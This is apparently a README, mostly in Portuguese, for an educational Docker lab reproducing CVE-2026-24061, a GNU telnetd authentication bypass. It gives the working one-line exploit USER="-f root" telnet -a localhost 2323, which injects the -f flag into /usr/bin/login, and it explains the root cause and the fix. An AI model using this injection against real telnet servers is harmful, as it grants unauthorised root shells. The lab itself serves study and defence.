
Educational Docker lab demonstrating CVE-2026-24061, an authentication bypass in GNU telnetd allowing root access via argument injection in the USER environment variable.
Este repositório contém um laboratório simples em Docker para demonstrar a vulnerabilidade CVE-2026-24061. Ela permite bypass de autenticação e acesso como root no GNU telnetd, no linux.
O objetivo é exclusivamente educacional.
docker build -t cve-2026-24061 .
docker run -it -p 2323:23 cve-2026-24061
Em outro terminal, execute:
USER="-f root" telnet -a localhost 2323
Após isso, o acesso será concedido diretamente como root, sem solicitação de senha.
A falha ocorre devido a uma injeção de argumentos durante a invocação do utilitário /usr/bin/login. O telnetd constrói dinamicamente a linha de comando usada para chamar o login e inclui o valor da variável de ambiente USER por meio do placeholder %U, sem qualquer sanitização.
Como o utilitário login aceita a opção -f, que ignora a autenticação por senha, um atacante pode definir USER="-f root" e forçar o login direto como root.
Como o telnetd é executado com privilégios elevados, essa manipulação resulta imediatamente em uma shell root sem necessidade de credenciais válidas. A exploração é simples, não exige interação prévia e pode ser facilmente automatizada, o que justifica a pontuação CVSS 9.8.
A vulnerabilidade foi corrigida com a introdução de validação e sanitização da variável USER, bloqueando valores iniciados por hífen e caracteres especiais, impedindo a injeção de argumentos no login.